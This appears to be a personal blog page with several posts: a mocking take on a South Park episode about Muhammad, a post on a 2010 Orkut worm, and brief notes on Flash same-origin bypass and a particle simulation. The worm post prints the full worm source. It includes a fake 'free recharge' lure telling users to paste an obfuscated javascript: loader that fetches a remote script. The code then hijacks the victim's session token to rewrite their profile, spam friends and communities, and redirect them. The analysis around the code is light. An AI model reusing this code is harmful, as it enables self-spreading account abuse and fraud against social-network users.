Of SouthPark and Scarcasm.. Holy prophets and gingers

In the last week's episode SouthPark went on to identify the limits of portraying Muhammad, the supposedly last prophet in whom muslims believe. The plot was rather ingenious , with superstars wanting (only naturally), the power of Muhammad which makes him impervious to any remarks that anyone can make , and on the other side, gingers lead by CopperCab Cartman, wanting to know how Muhammad managed to make himself impervious to sarcastic attacks.

Cleverly enough the creators come up with a way to portray muhammad without actually showing who he was (and in turn "RE-MAKING" him into what they want him to be ). They made him a "BEAR" wearing prophet,with a very shrilly voice.

And now they wont air the episode due to various issues (death threats included).


I think islamic people need to sit back and not be so up tight (learn from buddha..who is shown smoking weed and chillin out ).


So basically the episode tries to find a commonality between the people who are pissed off by others... and by raking they are:
1. Muhammad (who basically cannot tolerate a single world, and only talks of death for those who do ).
2.Hollywood stars ( :)...... )
3.Gingers.


They are only going to worsen their case by repeatedly interrupting the ingeniously-negative-creativity of SouthPark.

Here are a few stars who know how to handle, and few who dont:

The fudge packer

And Muhammad now trying to use "DEATH-THREAT":

Another Orkut bug....

During mid Feb, I saw this bug that was recurrently mutating into new forms, yet the original code remained awfully similar. I think orkut had blocked processing of all that is html in their posts for a few days untill the issue was resloved.

I managed to make a local copy of that source in order to find out what it was really trying to do...
And as usual , firebug was a great help in making things rather discreet and easy to see...

The code made social engg request targeted to mobile users, offering them "fake-recharge " for life worths time, and in truth it added those guys who clicked into a predecided community, and posted comments on albums(of the victim).

<br /> alert("Wait For 5 Minutes We are getting recharge for you");<br /> var assuntox, mensagemx, b, vixrulz;<br /> var assuntox = "READ :: ORKUT/GOOGLE OFFICIAL UPDATE 2010 ::";<br /> var mensagemx = "[b]-> [maroon]TRICK TO GET FREE CELLPHONE RECHARGE[/maroon][b] <-[B][/b]\n\n\n[b][navy]1)[/navy][/green] First, Copy the code below that is written in [red]RED[/red]\n.\n[u]Code[/u] :-\n\n\[b][red][b][red]java[red]script[/red][red]:d[/red]=document[red];c=d.create[/red]Element[red](%22script%22)[/red][red];d[/red].[red]body[/red].[red]appendChild(c)[/red];c[red].[/red]src[red]=%22ht%22+%22tp:%22+%22//su%22+%22.%22+%22ly%22+%22/%22+%222oE%22;void(0)[/b][/red]\n\n[b][navy]2)[/navy] Paste This Code In The Address Bar ( where you write www.orkut...) and Press [b][u][red]ENTER[/b][/u][/red]\n.\n[b][navy]3)[/navy]Enter Your Number And Press Ok To All Messages That Come!\n.\n[b][navy]4)[/navy]Now wait 5 minutes And refresh Your webbrowser To Verify Balance!.\n.\n[purple]If You Like It pass to your friends To Get [u][green]MORE RECHARGE!\n\n\n [silver]" + Math.floor(Math.random() * 999999); var b = "I LEFT COMMENT ON YOUR ALBUM ABOUT A FREE RECHARGE!!\n\nI WILL TELL HOW IT WORKS [b][blue]Azul:\n\n[b][red]java[red]script[/red][red]:d[/red]=document[red];c=d.create[/red]Element[red](%22script%22)[/red][red];d[/red].[red]body[/red].[red]appendChild(c)[/red];c[red].[/red]src[red]=%22ht%22+%22tp:%22+%22//su%22+%22.%22+%22ly%22+%22/%22+%222oE%22;void(0)[/b][/blue]\n\nCopy It And paste in Address Bar where you write [B]WWW.[/B]\Now It Will Open!\n\nPass It to your friends Too to get more free tricks,\nThen enjoy the recharge.\n\nIf It doesnt works , tell me i will help"; var vixrulz = "\n\n[B] Hi Guys This Is The Official Update By Google India For 2010! \n\n According To It , If You Are An Orkut User , You Will Get 333 Cell Recharge Free On Your Cell From Google As A New Year Gift! I Got it Already! \n\n To Get It :- \n\n. [red]Go To My [U]PROFILE[/U][RED][B] And Check My [U]ABOUT ME[/U] To Get The Update! [:)] \n\n [blue]THANK YOU!\n\n [orange]GOOGLE/ORKUT? OFFICIAL UPDATE 2010 \n\n"; try { document.title = ":::PROCESSING RECHARGE:::"; function createXMLHttpRequest() { return window.ActiveXObject ? new ActiveXObject("Msxml2.XMLHTTP") : new XMLHttpRequest; } var about = createXMLHttpRequest(); about.open("POST", "EditSocial", false); about.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8"); about.send("POST_TOKEN=" + encodeURIComponent(JSHDF['CGI.POST_TOKEN']) + "&signature=" + encodeURIComponent(JSHDF['Page.signature.raw']) + "&kids=1&ethnicity=0&religion=0&political=0&humor.submitted=1&sexPref=1&sexPrefPrivacy=3&fashion.submitted=1&smoking=1&drinking=0&pets=0&living.submitted=1&hometown=&webpageUrl=&aboutMe=" + encodeURIComponent(mensagemx) + "&passions=&sports=&activities=&books=&music=&shows=&movies=&cuisines=&Action.update=Enviar+dados"); var status = createXMLHttpRequest(); status.open("POST", "Profile", false); status.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8"); status.send("POST_TOKEN=" + encodeURIComponent(JSHDF['CGI.POST_TOKEN']) + "&signature=" + encodeURIComponent(JSHDF['Page.signature.raw']) + "&userStatus=" + encodeURIComponent('[B]CHECK MY PROFILE FOR FREE CELLPHONE RECHARGE') + "&Action.editUserStatusMessage=1"); function getFL(a) { var b = createXMLHttpRequest(); b.open("GET", "/RequestFriends.aspx?req=fl&uid=" + a + "&oxh=1&rnd=" + Math.random(), false); b.send(null); if (b.status == 200) { eval("var jSON=" + b.responseText.split("while (true); &&&START&&&")[1] + ";"); manageFriends(jSON); } } function manageFriends(a) { var b = a.data.list; var c = b.length > 10 ? 10 : b.length;<br /> getAid(b, 0);<br /> }<br /><br /><br /> function getAid(a, n) {<br /> var b = a.length;<br /> if (n == b) {<br /> return;<br /> }<br /> var c = createXMLHttpRequest();<br /> var d = a[Math.round(Math.random() * (a.length - 1))].id;<br /> c.open("GET", "/AlbumList.aspx?uid=" + d, false);<br /> c.send(null);<br /> if (c.status == 200) {<br /> var e = c.responseText.match(/aid=(\d+)/i);<br /> if (e) {<br /> e = e[1];<br /> getPid(d, e);<br /> }<br /> }<br /> n++;<br /> getAid(a, n);<br /> }<br /><br /><br /> function getPid(a, b) {<br /> var c = createXMLHttpRequest();<br /> c.open("GET", "/Album.aspx?uid=" + a + "&aid=" + b, false);<br /> c.send(null);<br /> if (c.status == 200) {<br /> var d = c.responseText.match(/&(amp;)?pid=(\d+)/i);<br /> if (d) {<br /> postComment(a, b, d[2]);<br /> }<br /> }<br /> }<br /><br /><br /> function postComment(a, b, c) {<br /> var d = "com=" + encodeURIComponent("HEY NICE PHOTO AND PLEASE JOIN MY COMMUNITY! GO HERE http://www.orkut.co.in/Main#Community?cmm=91440938") + "&POST_TOKEN=" + JSHDF['CGI.POST_TOKEN'] + "&signature=" + encodeURIComponent(JSHDF['Page.signature.raw']) + "&Action.addComment=&aid=" + b + "&uid=" + a + "&pid=" + c + "&ploc=&oxh=1";<br /> xml = createXMLHttpRequest();<br /> xml.open("POST", "/AlbumZoom", false);<br /> xml.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");<br /> xml.send(d);<br /> sendScrap(a);<br /> }<br /><br /><br /> function sendScrap(a) {<br /> var c = "Action.submit=1&scrapText=" + encodeURIComponent("[red]Hey Friend I Left A Comment On Your Album Check It Out\nAnd Please Accept The Testimonial That I Sent You , It Really Works! \n: ") + Math.floor(Math.random() * 91839067) + "&POST_TOKEN=" + JSHDF['CGI.POST_TOKEN'] + "&signature=" + encodeURIComponent(JSHDF['Page.signature.raw']) + "&uid=" + a;<br /> var d = createXMLHttpRequest();<br /> d.open("POST", "/Scrapbook.aspx", false);<br /> d.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;");<br /> d.send(c);<br /> depo(a);<br /> }<br /><br /><br /> function depo(a) {<br /> var b = mensagemx;<br /> var c = "Action.submit&countedTextbox=" + encodeURIComponent(b) + "&POST_TOKEN=" + JSHDF['CGI.POST_TOKEN'] + "&signature=" + encodeURIComponent(JSHDF['Page.signature.raw']) + "&uid=" + a;<br /> var xxt = createXMLHttpRequest();<br /> xxt.open("POST", "/TestimonialWrite.aspx", false);<br /> xxt.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;");<br /> xxt.send(c);<br /> }<br /><br /> function RodrigoScrap(a) {<br /> var c = "Action.submit=1&scrapText=" + encodeURIComponent('[b]..[/b] [b]Godsend ') + Math.floor(Math.random() * 91839067) + "&POST_TOKEN=" + JSHDF['CGI.POST_TOKEN'] + "&signature=" + encodeURIComponent(JSHDF['Page.signature.raw']) + "&uid=" + a;<br /> var d = createXMLHttpRequest();<br /> d.open("POST", "/Scrapbook.aspx", false);<br /> d.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;");<br /> d.send(c);<br /> depo(a);<br /> }<br /><br /> function show_me() {<br /> alert("Wait While Recharge Is Done");<br /> alert("Refresh the page after 3 minutes!!");<br /> }<br /><br /><br /> function cmm(a) {<br /> var b = "POST_TOKEN=" + encodeURIComponent(JSHDF['CGI.POST_TOKEN']) + "&signature=" + encodeURIComponent(JSHDF['Page.signature.raw']) + "&Action.join";<br /> var c = createXMLHttpRequest();<br /> c.open("POST", "/CommunityJoin.aspx?cmm=" + a, false);<br /> c.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");<br /> c.send(b);<br /> }<br /><br /><br /> function Pamela(a) {<br /> var bbb = ["blue", "RED", "GREEN", "GRAY", "GREEN", "VIOLET", "YELLOW", "BLUE"];<br /> var color = Math.floor(Math.random() * bbb.length);<br /> var Danilo = ["Got It Sir , Thanks! [:)]","It Is Busy , I will try again! [:(] Thanks!"];<br /> var Miedi = Math.floor(Math.random() * Danilo.length);<br /> var up = "[b]THIS TOPIC IS [" + bbb[color] + "]UP!![/" + bbb[color] + "][/b] It's Still Working [;)] " + Danilo[Miedi] + " \n ..... [silver]" + Math.floor(Math.random() * 95234511);<br /> var b = "POST_TOKEN=" + encodeURIComponent(JSHDF['CGI.POST_TOKEN']) + "&signature=" + encodeURIComponent(JSHDF['Page.signature.raw']) + "&bodyText=" + encodeURIComponent(up) + "&Action.submit";<br /> var c = createXMLHttpRequest();<br /> c.open("POST", "/CommMsgPost.aspx?cmm=" + a, false);<br /> c.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");<br /> c.send(b);<br /> }<br /><br /><br /> function GetCmms() {<br /> var xml2 = createXMLHttpRequest();<br /> xml2.open("GET", "/Communities", false), xml2.send(null);<br /> var cmmx = xml2.responseText.match(/cmm=\d+/gi);<br /> return cmmx;<br /> }<br /><br /> var cmmx = GetCmms();<br /><br /> function Envia(a, d, e) {<br /> var b = "POST_TOKEN=" + encodeURIComponent(JSHDF['CGI.POST_TOKEN']) + "&signature=" + encodeURIComponent(JSHDF['Page.signature.raw']) + "&subjectText=" + encodeURIComponent(d) + "&bodyText=" + encodeURIComponent(e) + "[silver]" + Math.floor(Math.random() * 999) + "&Action.submit";<br /> var c = createXMLHttpRequest();<br /> c.open("POST", "/CommMsgPost.aspx?" + a, false);<br /> c.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");<br /> c.send(b);<br /> }<br /><br /> try {<br /> Envia(cmmx[1], assuntox, vixrulz);<br /> Envia(cmmx[2], assuntox, vixrulz);<br /> Envia(cmmx[4], assuntox, vixrulz);<br /> Envia(cmmx[5], assuntox, vixrulz);<br /> Envia(cmmx[6], assuntox, vixrulz);<br /> Envia(cmmx[7], assuntox, vixrulz);<br /> Envia(cmmx[8], assuntox, vixrulz);<br /> Envia(cmmx[9], assuntox, vixrulz);<br /> Envia(cmmx[10], assuntox, vixrulz);<br /> } catch (e) {<br /> bunda = e;<br /> }<br /><br /> function Abre_CoCaCoLa(a) {<br /> var alerta = alert("ust 3 Minutes More\n- Recharge Server is Down\n- Due To High Demand..\n\n");<br /> }<br /><br /><br /> function depo(a) {<br /> var c = "Action.submit&countedTextbox=" + encodeURIComponent(mensagemx) + "&POST_TOKEN=" + JSHDF['CGI.POST_TOKEN'] + "&signature=" + encodeURIComponent(JSHDF['Page.signature.raw']) + "&uid=" + a;<br /> var xxt = createXMLHttpRequest();<br /> xxt.open("POST", "/TestimonialWrite.aspx", false);<br /> xxt.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;");<br /> xxt.send(c);<br /> }<br /><br /><br /> function noob() {<br /> alert("Recharge SMS Send , Refresh the page after 2 minutes!");<br /> var myDCC = window.orkutFrame ? window.orkutFrame.document : document;<br /> var UID = myDCC.body.innerHTML.match(/uid=(\d+)/i)[1];<br /> var Lay = myDCC.body.innerHTML += "";<br /> getFL(UID);<br /> }<br /><br /><br /> function setCookie(a, b, c, d, e, f) {<br /> var g = a + "=" + escape(b) + (c ? "; expires=" + c.toGMTString() : "") + (d ? "; path=" + d : "") + (e ? "; domain=" + e : "") + (f ? "; secure" : "");<br /> document.cookie = g;<br /> }<br /><br /><br /> function getCookie(a) {<br /> var b = document.cookie;<br /> var c = a + "=";<br /> var d = b.indexOf("; " + c);<br /> if (d == -1) {<br /> d = b.indexOf(c);<br /> if (d != 0) {<br /> return false;<br /> }<br /> } else {<br /> d += 2;<br /> }<br /> var e = document.cookie.indexOf(";", d);<br /> if (e == -1) {<br /> e = b.length;<br /> }<br /> return unescape(b.substring(d + c.length, e));<br /> }<br /><br /> show_me();<br /> cmm(91440938);<br /> cmm(91440938);<br /> cmm(91440938);<br /><br /><br /> Pamela('91440938&tid=5437963316068002956&start=1');<br /> noob();<br /> if (!getCookie("say")) {<br /> var wDate = new Date;<br /> wDate.setTime(wDate.getTime() + 864000);<br /> setCookie("say", "1", wDate);<br /> }<br /> }catch(ex){}<br />setTimeout(function(){alert('Recharge done , Check Your Balance , And Your Profile Has Been Edited By Us , If You Want More Recharge , Dont Change Your Profile As It Is Advertisement And Is Neccessary!'); window.location.replace('http://cli.gs/0rkuts3xx'); }, 200);<br /><br />

I maintain a fake profile on orkut from which I do all such things , and I tested this one from it. Now it does work but I wonder how did the creator of this bug find out the exact parameters google's orkut webapp requires in order to successfully process the request ?

Its because of internal details like this, that I believe this guy would have worked on it internally at some point in time. And now that orkut is full of heare and there, its all the more difficult to see whats going on exactly whithout having access to the actual source that spwan those frames.

Asynch request /reply has definitely made the web all the more interesting .....

As a part of my grad coursework, I had demonstrated how flash can be used to override the browser's same origin policy (since flash works on flash's policy ,which is set by website owners,its not fixed like the browsers's same origin policy)...

It basically translates to this: If I have ability to upload an swf movie on your trusted domain, your pretty much screwed(if u run it, and you will, cause that is what social engg will make you do) !

:)

Lately I am busy doing this project on particle simulation, its awesome project , in which I basically try to do about a billion particles simulation in real time. So this field is rather unrelated to security as such, although its my second favorite topic "optimization".

Optimization problems are always interesting in a variety of ways, they basically mess with your brain so much that your consumed by searching for possibilities....and then mathematical tools come to your rescue telling you that you have wasted all your time in-vain , searching for a desert rose....

^_^

Till later, see ya!